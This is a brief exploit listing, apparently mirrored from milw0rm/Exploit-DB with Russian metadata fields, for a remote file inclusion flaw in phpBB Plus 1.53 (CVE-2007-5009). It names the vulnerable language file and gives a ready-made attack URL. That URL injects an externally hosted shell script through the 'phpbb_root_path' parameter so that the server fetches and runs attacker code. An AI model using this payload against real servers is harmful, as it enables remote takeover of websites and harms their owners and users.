Exploit phpBB Plus 1.53 - 'phpbb_root_path' Remote File Inclusion

[Exploiter]

EDB-ID

4434

Проверка EDB

1. Пройдено

Автор

MEHRAD

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2007-5009

Дата публикации

2007-09-20

AUTHOR = Mehrad Ansari Targhi
E-Mail : [email protected]
My Yahoo Messenger ID : mehrad_1989

Script Download URL : http://www.phpbbplus.net/PhpBBPlus1.53.zip

This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang
_main_album.php

Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=

# milw0rm.com [2007-09-20]